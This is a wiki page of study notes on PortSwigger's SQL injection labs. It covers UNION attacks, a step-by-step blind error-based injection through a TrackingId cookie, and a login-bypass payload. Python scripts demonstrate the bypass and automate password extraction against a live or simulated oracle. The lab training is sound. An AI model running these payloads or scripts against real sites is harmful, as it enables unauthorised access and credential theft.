Burp Suite/SQL Injection
From charlesreid1
Revision as of 02:13, 22 May 2023
This page covers how to perform SQL Injection attacks with Burp Suite.
Burp Suite Training
SQL Injection Labs
https://portswigger.net/web-security/sql-injection
Lab 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
- https://www.youtube.com/watch?v=alTceRdSxS0
- lab doesn't require burp suite, just tinkering with URL parameters
- single quotes raising internal errors are a sign of SQL Injection vulnerability
Lab 2: SQL injection vulnerability allowing login bypass
- https://portswigger.net/web-security/sql-injection/lab-login-bypass
- https://www.youtube.com/watch?v=ML3aGaloczI
- lab doesn't require burp suite, just feeding SQL queries into login form
- guessing, i.e. assuming the query behind the login form looks something like
    SELECT firstname FROM users WHERE username='admin' AND password='admin'
- single quotes raising internal errors are a sign of SQL Injection vulnerability
- if at first you don't succeed, try, try again: admin, administrator, etc etc etc
- https://www.youtube.com/watch?v=fMPvCyD2v4w
- This is another version of the same lab, but using the Python requests library
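Added example (not code from this page, the lab, or PortSwigger) showing why the guessed query above can be bypassed: the form's input lands inside the SQL string, so a quote breaks the query (the page's first sign of injection) and a quote followed by a comment marker `--` cuts the password check off entirely. The `users` table, its passwords, and sqlite3 standing in for the lab's database are all constructed here; the lab's real values are not known. The hardened version with bound parameters is shown beside it.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table; the rows are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, firstname TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("administrator", "not-the-lab-password", "Admin"),
            ("wiener", "peter", "Peter"),
        ],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """The query the page guesses, built by string concatenation.

    Returns the firstname on a successful login, None otherwise. Because the
    input is spliced into the SQL text, a username of administrator'-- turns
    the statement into
        ... WHERE username='administrator'-- ' AND password='...'
    and everything after -- is a comment, so the password is never checked.
    """
    sql = (
        f"SELECT firstname FROM users WHERE username='{username}' "
        f"AND password='{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT firstname FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def quote_raises_error(conn: sqlite3.Connection) -> bool:
    """The page's tell-tale: a stray single quote makes the query malformed,
    which the lab surfaces as an internal server error."""
    try:
        vulnerable_login(conn, "admin'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("quote breaks the query:", quote_raises_error(db))
    print("bypass against vulnerable query:", vulnerable_login(db, "administrator'--", "anything"))
    print("bypass against parameterised query:", safe_login(db, "administrator'--", "anything"))
```

The page's "try admin, administrator, etc." step is the only guessing left once the password check is commented out: the payload still has to name a username that exists.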
SQL Injection UNION Attacks
https://portswigger.net/web-security/sql-injection/union-attacks
Lab 3: SQL injection UNION attack, determining the number of columns returned by the query
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
- this page covers a ton of information: SQL Injection/UNION Attack
- guide: https://www.youtube.com/watch?v=umXGHbEyW5I
Lab 4: SQL injection UNION attack, finding a column containing text
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
- guide: https://www.youtube.com/watch?v=SGBTC5D7DTs
Lab 5: SQL injection UNION attack, retrieving data from other tables
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
- guide: https://www.youtube.com/watch?v=6Dsj5SqR944
Lab 6: SQL injection UNION attack, retrieving multiple values in a single column
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column
- guide: https://www.youtube.com/watch?v=yRVYoqR9vrI
Examining the Database
Lab 7: SQL injection attack, querying the database type and version on Oracle
Lab 8: SQL injection attack, querying the database type and version on MySQL and Microsoft
Lab 9: SQL injection attack, listing the database contents on non-Oracle databases
Lab 10: SQL injection attack, listing the database contents on Oracle
Blind SQL Injection
https://portswigger.net/web-security/sql-injection/blind
Lab 11: Blind SQL injection with conditional responses
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
- https://www.youtube.com/watch?v=LBG_n9fr8sM&themeRefresh=1
Lab 12: Blind SQL injection with conditional errors
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
- https://www.youtube.com/watch?v=_7w-KEP_K5w
- this one takes a while; Intruder is rate-limited in the Community edition, so it is faster to do with the Professional edition
- visit a page, capture the request, and add a single quote to the TrackingId cookie value to raise a 500 error
step 1: prove parameter is vulnerable
- to prove the parameter is vulnerable to SQL injection, use the string concatenation operator || to splice a subquery into the cookie value:
    ' || (select '') || '
- this is a well-formed query on most databases, yet it returns a 500 error
- weird, because this should work, not return a 500 error
- indication that this could be an Oracle database, since Oracle requires a FROM clause in every SELECT
    ' || (select '' from dual) || '
- paste that SQL into the Cookie TrackingId value, use Control + U to URL encode it
- dual is a built-in one-row Oracle table, used when a SELECT needs a FROM clause but no real table
- this returns a 200, indicating this is, in fact, an Oracle database
- but if we replace "dual" with "dualoiweuroqiurepoiquwer" (a table that does not exist) then it fails with a 500 again
step 2: confirm users table exists in database
    ' || (select '' from users) || '
- this returns an internal server error
- the problem is not the table but the number of rows: a subquery used inside a string expression must return a single row, and users has many
- modify the query to limit it to one row:
    ' || (select '' from users where rownum = 1) || '
- that returns a 200, indicating there is, in fact, a users table in the database
step 3: confirm the administrator user exists in the users database
- to do this: modify the prior SQL query
    ' || (select '' from users where username='administrator') || '
- the problem: this returns a 200 either way (if there is no administrator user, the subquery simply returns nothing, which is not an error)
- solution: add a conditional, and divide by zero when the condition is met
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
- should cause an error (500)
    ' || (select CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
- should NOT cause an error (200)
- now we can use that to check for the username:
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || '
- the CASE expression is only evaluated for rows that match the WHERE clause. if a row matches, the 1/0 is evaluated and raises an error (500). if no row matches, the subquery returns nothing, the division never runs, and there is no error.
- in other words, a 200 response means the user does not exist in the database; a 500 means it does
step 4: check the length of the password by modifying the same query
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>1) || '
- same mechanism: if the WHERE clause is true (password length > 1), the row matches and the 1/0 raises a 500 error. increment the number until you get a 200; the first N for which LENGTH(password)>N is false is the length of the password.
- to generate lots of requests, right-click the request and choose Send to Intruder
- Intruder > Positions > Clear
- select the "1" (the password length) and choose Add
- Intruder > Payloads > Numbers, sequential, from 1 to 50, step count of 1
- when the payload 20 is sent, it returns a 200 status code (every smaller payload returned 500)
- so, we know the length of the password is 20 (LENGTH(password)>19 is true, LENGTH(password)>20 is not)
step 5: output the administrator password
- we have 20 characters to enumerate
- modify the query from the preceding step, but use the substring function
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password,1,1)='a') || '
- how does this work?
- the WHERE clause looks for a users row with username administrator whose first password character is equal to a. if such a row exists, the CASE expression is evaluated for it, which runs the 1/0 and raises the error.
- 200 response means the first character of the password is NOT a
- 500 response means the first character of the password IS a
- copy that SQL query and put it into Repeater:
- copy and paste into TrackingId
- Control + U to URL encode it
- 200 response, meaning a is not the first character of the password
- Intruder > Positions > Clear
- select the "a" and choose Add
- then go to Intruder > Payloads
- Payload Type: Brute forcer (tries all lowercase alphanumeric characters, a-z and 0-9)
- min length = 1, max length = 1
- generates 36 requests
- look for the one 500 response (here, "w")
- next, do the same for the second character, then the third, and so on
- instead of doing that 20 times, automate it:
step 6: automate the attack in burp suite
- Intruder > Positions
- Change Attack type to Cluster bomb (tries every combination of the two payload sets)
- select the substring position number "1" (the second argument of SUBSTR) and choose Add. select the character "a" being checked and choose Add.
- Intruder > Payloads
- payload set 1 (position): Numbers type (from 1, to 20, step 1), iterates over each character position
- payload set 2 (letter): Brute forcer (all lowercase alphanumeric characters, min length = max length = 1)
- this will generate 20 x 36 = 720 requests total
- sort the results by status code: the 20 requests that returned 500 give one character per position; read them off in position order to get the password
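Added example (not code from this page or from PortSwigger) that does steps 4 through 6 in a script instead of Intruder, for when the Community edition's rate limit makes 720 requests painful. It assumes exactly what the page does: the injection point is the end of the `TrackingId` cookie value, the target is the `administrator` row of `users`, the backend is Oracle, and the oracle is the status code (500 when the injected WHERE clause matches a row, 200 when it does not). The lab URL, the `session` cookie name, and the use of the `requests` library are assumptions for the live version; `simulated_oracle` is a constructed stand-in that evaluates the injected condition against a made-up 20-character secret so the script runs offline.

```python
import re
import string
from typing import Callable
from urllib.parse import quote

# Same character set as Burp Intruder's "Brute forcer" payload type: a-z, 0-9.
CHARSET = string.ascii_lowercase + string.digits

# An oracle takes the raw (un-encoded) injection payload and returns the
# HTTP status code the server answered with.
Oracle = Callable[[str], int]

# Common prefix/suffix of every payload on the page: a scalar subquery spliced
# into the cookie value with ||. TO_CHAR(1/0) is only evaluated for rows that
# satisfy the WHERE clause, so a matching row turns into a 500.
PREFIX = ("' || (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END "
          "FROM users WHERE username='administrator' AND ")
SUFFIX = ") || '"


def length_payload(n: int) -> str:
    """Step 4 payload: errors iff LENGTH(password) > n."""
    return f"{PREFIX}LENGTH(password)>{n}{SUFFIX}"


def char_payload(pos: int, ch: str) -> str:
    """Step 5 payload: errors iff the pos-th character (1-based) is ch."""
    return f"{PREFIX}SUBSTR(password,{pos},1)='{ch}'{SUFFIX}"


def find_length(oracle: Oracle, max_len: int = 50) -> int:
    """Step 4: the first n for which LENGTH(password)>n is false (200) is the length."""
    for n in range(1, max_len + 1):
        if oracle(length_payload(n)) == 200:
            return n
    raise RuntimeError(f"password longer than {max_len}, or the oracle is not working")


def find_password(oracle: Oracle, length: int) -> str:
    """Step 6: the cluster-bomb loop, position-major, stopping early on each hit."""
    found = []
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(char_payload(pos, ch)) == 500:
                found.append(ch)
                break
        else:
            raise RuntimeError(f"no character in CHARSET matched position {pos}")
    return "".join(found)


def http_oracle(url: str, tracking_id: str, session: str) -> Oracle:
    """Oracle backed by the live lab (assumed cookie names and URL).

    The payload is appended to the original TrackingId value and URL-encoded,
    as Ctrl+U does in Burp, so the Cookie header stays well-formed.
    """
    import requests  # only needed for the live version

    def oracle(payload: str) -> int:
        cookies = {"TrackingId": tracking_id + quote(payload, safe=""),
                   "session": session}
        return requests.get(url, cookies=cookies, allow_redirects=False,
                            timeout=10).status_code
    return oracle


def simulated_oracle(secret: str) -> Oracle:
    """Constructed stand-in for the lab: evaluates the injected WHERE condition
    against a known secret instead of letting Oracle divide by zero."""
    len_re = re.compile(r"LENGTH\(password\)>(\d+)")
    sub_re = re.compile(r"SUBSTR\(password,(\d+),1\)='([^']*)'")

    def oracle(payload: str) -> int:
        if m := len_re.search(payload):
            return 500 if len(secret) > int(m.group(1)) else 200
        if m := sub_re.search(payload):
            pos, ch = int(m.group(1)), m.group(2)
            return 500 if secret[pos - 1:pos] == ch else 200
        return 200  # no recognised condition: no matching row, no error
    return oracle


if __name__ == "__main__":
    # Constructed 20-character secret; the real lab's password is different.
    demo = simulated_oracle("w3k9qz1m7x0b2c4d6e8f")
    n = find_length(demo)
    print(f"password length: {n}")
    print(f"password: {find_password(demo, n)}")
```

Against the real lab, swap `demo` for `http_oracle("https://<lab-host>/", "<TrackingId value>", "<session value>")`. The early `break` in `find_password` is the one thing the script does better than Cluster bomb: it sends at most 36 requests per position instead of always 36, and in practice far fewer.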
Cheat Sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet